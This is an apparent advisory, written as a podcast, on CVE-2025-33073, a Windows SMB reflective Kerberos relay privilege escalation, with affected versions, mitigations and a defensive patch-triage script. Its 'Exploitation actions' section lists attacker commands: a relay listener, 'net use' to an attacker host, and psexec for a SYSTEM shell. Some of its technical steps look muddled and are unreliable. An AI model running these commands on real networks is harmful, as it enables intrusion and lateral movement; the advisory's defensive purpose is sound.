Windows SMB client: Improper access control in Windows SMB allowing privilege escalation via Reflective Kerberos Relay (CVE-2025-33073)

Summary

Hello and welcome to this podcast. Today we’re talking about CVE-2025-33073, a serious privilege-escalation vulnerability in Windows Server Message Block (SMB). Publicly disclosed by Microsoft on June 10, 2025, this issue could allow an authenticated attacker on the network to elevate to SYSTEM privileges via a reflective Kerberos relay attack. We’ll break down what it is, which products are affected, how it works, and how you can protect your systems.

Product details

CVE-2025-33073 affects a broad range of Windows operating systems and install options. All builds of Windows 10 (from Version 1507 up through 24H2), Windows 11 (22H2, 22H3, 23H2, 24H2), Windows Server 2008 SP2 (including Server Core), Server 2008 R2 SP1, Server 2012/R2, Server 2016, Server 2019 (and Server Core), Server 2022 (and 23H2 Core), and the new Windows Server 2025 (and its Core installation) are impacted if they have not been updated to the June 2025 security releases.

Vulnerability type summary

This vulnerability stems from improper access control (CWE-284) in the Windows SMB client implementation. An attacker with valid credentials can perform a reflective Kerberos relay using NTLM tokens over SMB, tricking the system into issuing higher-privileged tickets. This bypasses intended Kerberos safeguards and leads to SYSTEM-level execution.

Details of the vulnerability

Here’s how it works:

  1. The attacker must first authenticate to an SMB share using normal credentials (for example, a low-privilege domain user).
  2. The malicious SMB server then reflects the attacker’s NTLM authentication back at the client, triggering a Kerberos service ticket request for the attacker’s own identity.
  3. Because of a flaw in how Windows caches and validates those tokens, the client unwittingly accepts a ticket with elevated privileges and presents it to itself.
  4. The attacker uses this elevated ticket to run code as SYSTEM on the target machine.

This attack can be launched from a compromised host inside the network or via a malicious SMB endpoint. It requires no user interaction beyond supplying valid credentials and exploits the way Windows handles reflected Kerberos authentication over SMB.

Conclusion

CVE-2025-33073 represents a powerful means for lateral movement and privilege escalation in Windows environments. To mitigate the risk:

  • Apply Microsoft’s June 2025 cumulative updates immediately on all affected systems.
  • Restrict SMB exposure to untrusted networks; enforce SMB signing and encryption where possible.
  • Monitor for unusual Kerberos ticket requests and NTLM relay behavior.
  • Follow the principle of least privilege and rotate service account credentials.

That wraps up our deep-dive on CVE-2025-33073. Stay patched, stay vigilant, and thanks for listening.

Remediation and exploitation details

This chain involves the following actors

  • Attacker: Authorized domain user leveraging network access
  • Security Administrator: Responsible for system patching and hardening

The following systems are involved

  • Windows SMB Client (Network file and printer sharing): Initiates server message block authentication requests
  • Kerberos Relay Framework (Intercepts and relays authentication tokens): Exploitation tool for privilege escalation
  • Domain Controller (Issues Kerberos tickets): Central authentication authority

Attack entry point

  • Malicious SMB Server: Rogue server that captures Kerberos authentication from the client

Remediation actions

Actor: Security Administrator
Action: Apply June 2025 security update
System: Windows SMB Client

Actor: Security Administrator
Action: Enforce server message block packet signing
System: Windows SMB Client

Actor: Security Administrator
Action: Restrict inbound server message block access via firewall rules
System: Windows SMB Client

Exploitation actions

Set up a listener for inbound SMB connections on port 445

Actor: Attacker
Action: Deploy malicious server
System: Kerberos Relay Framework
Examples:
  • krelay --listen 0.0.0.0:445 --target cifs/host

Trick a user or machine to connect to the malicious server via a network share path

Actor: Attacker
Action: Induce client authentication
System: Windows SMB Client
Examples:
  • net use \\attacker_ip\share /user:domain\\user password

Intercept the authentication request message from the client

Actor: Attacker
Action: Capture Kerberos request token
System: Kerberos Relay Framework
Examples:
  • krelay --capture

Forward the captured request to a privileged service endpoint on the local network

Actor: Attacker
Action: Relay token to target service
System: Domain Controller
Examples:
  • krelay --relay-to cifs/target_host

Use the relayed token to request a service ticket and bind to the service as the system account

Actor: Attacker
Action: Authenticate as system
System: Windows SMB Client
Examples:
  • rpcclient -U ''%ticket%'' target_host -c '!'

Spawn a system privileged shell and move laterally across the network

Actor: Attacker
Action: Execute code with system rights
System: Windows SMB Client
Examples:
  • psexec.py target_host -hashes : -no-pass cmd.exe

CVE database technical details

CVE ID: CVE-2025-33073
Description: Improper access control in Windows SMB allows an authorized attacker to elevate privileges over a network.
Provider: microsoft
CWE / problem types: CWE-284: Improper Access Control
Date Published: 2025-06-10T17:02:35.874Z
Last Updated: 2025-06-13T01:10:43.119Z

Affected Software Versions (vendor: Microsoft; versionType: custom; status: affected). Each entry gives the first affected version and the exclusive upper bound ("lessThan"):

  • Windows 10 Version 1507: 10.0.10240.0 up to, but not including, 10.0.10240.21034
  • Windows 10 Version 1607: 10.0.14393.0 up to, but not including, 10.0.14393.8148
  • Windows 10 Version 1809: 10.0.17763.0 up to, but not including, 10.0.17763.7434
  • Windows 10 Version 21H2: 10.0.19044.0 up to, but not including, 10.0.19044.5965
  • Windows 10 Version 22H2: 10.0.19045.0 up to, but not including, 10.0.19045.5965
  • Windows 11 version 22H2: 10.0.22621.0 up to, but not including, 10.0.22621.5472
  • Windows 11 version 22H3: 10.0.22631.0 up to, but not including, 10.0.22631.5472
  • Windows 11 Version 23H2: 10.0.22631.0 up to, but not including, 10.0.22631.5472
  • Windows 11 Version 24H2: 10.0.26100.0 up to, but not including, 10.0.26100.4349
  • Windows Server 2008 Service Pack 2: 6.0.6003.0 up to, but not including, 6.0.6003.23351
  • Windows Server 2008 Service Pack 2 (Server Core installation): 6.0.6003.0 up to, but not including, 6.0.6003.23351
  • Windows Server 2008 R2 Service Pack 1: 6.1.7601.0 up to, but not including, 6.1.7601.27769
  • Windows Server 2008 R2 Service Pack 1 (Server Core installation): 6.1.7601.0 up to, but not including, 6.1.7601.27769
  • Windows Server 2012: 6.2.9200.0 up to, but not including, 6.2.9200.25522
  • Windows Server 2012 (Server Core installation): 6.2.9200.0 up to, but not including, 6.2.9200.25522
  • Windows Server 2012 R2: 6.3.9600.0 up to, but not including, 6.3.9600.22620
  • Windows Server 2012 R2 (Server Core installation): 6.3.9600.0 up to, but not including, 6.3.9600.22620
  • Windows Server 2016: 10.0.14393.0 up to, but not including, 10.0.14393.8148
  • Windows Server 2016 (Server Core installation): 10.0.14393.0 up to, but not including, 10.0.14393.8148
  • Windows Server 2019: 10.0.17763.0 up to, but not including, 10.0.17763.7434
  • Windows Server 2019 (Server Core installation): 10.0.17763.0 up to, but not including, 10.0.17763.7434
  • Windows Server 2022: 10.0.20348.0 up to, but not including, 10.0.20348.3807
  • Windows Server 2022, 23H2 Edition (Server Core installation): 10.0.25398.0 up to, but not including, 10.0.25398.1665
  • Windows Server 2025: 10.0.26100.0 up to, but not including, 10.0.26100.4349
  • Windows Server 2025 (Server Core installation): 10.0.26100.0 up to, but not including, 10.0.26100.4349
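
The affected-version bounds above can be used to triage a host inventory for the "apply the June 2025 update" remediation. The following is an added example, not code from Microsoft or from this page's author. It assumes each host reports a four-part version string, treats the "lessThan" bound as the first patched revision, and uses a constructed sample inventory with made-up host names.

```python
# Map "major.minor.build" to the first patched revision, copied from the
# 'lessThan' values in the affected-version data on this page.
FIXED = {
    "10.0.10240": 21034, "10.0.14393": 8148, "10.0.17763": 7434,
    "10.0.19044": 5965, "10.0.19045": 5965, "10.0.20348": 3807,
    "10.0.22621": 5472, "10.0.22631": 5472, "10.0.25398": 1665,
    "10.0.26100": 4349, "6.0.6003": 23351, "6.1.7601": 27769,
    "6.2.9200": 25522, "6.3.9600": 22620,
}


def classify(version):
    """Return 'vulnerable', 'patched' or 'unknown' for a Windows version string."""
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        return "unknown"  # malformed or truncated inventory value: review by hand
    branch, revision = ".".join(parts[:3]), int(parts[3])
    fixed = FIXED.get(branch)
    if fixed is None:
        return "unknown"  # build branch not listed on this page
    # Affected range is [branch.0, lessThan): below the bound means unpatched.
    return "vulnerable" if revision < fixed else "patched"


def triage(inventory):
    """Group host names by status; inventory is an iterable of (host, version)."""
    report = {"vulnerable": [], "patched": [], "unknown": []}
    for host, version in inventory:
        report[classify(version)].append(host)
    return report


# Constructed sample inventory (host names and revisions are invented).
SAMPLE = [
    ("fs01", "10.0.17763.7314"),  # Server 2019 branch, below 7434
    ("dc01", "10.0.20348.3807"),  # Server 2022 branch, exactly at the bound
    ("ws17", "10.0.26100.4061"),  # Windows 11 24H2 branch, below 4349
    ("ws22", "10.0.22631.5624"),  # Windows 11 23H2 branch, above 5472
    ("app3", "10.0.99999.1"),     # branch not in the table
    ("old1", "6.3.9600"),         # truncated value, revision missing
]

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE).items():
        print(f"{status:10} {', '.join(hosts) or '-'}")
```

Hosts reported as unknown need a manual check rather than being assumed safe.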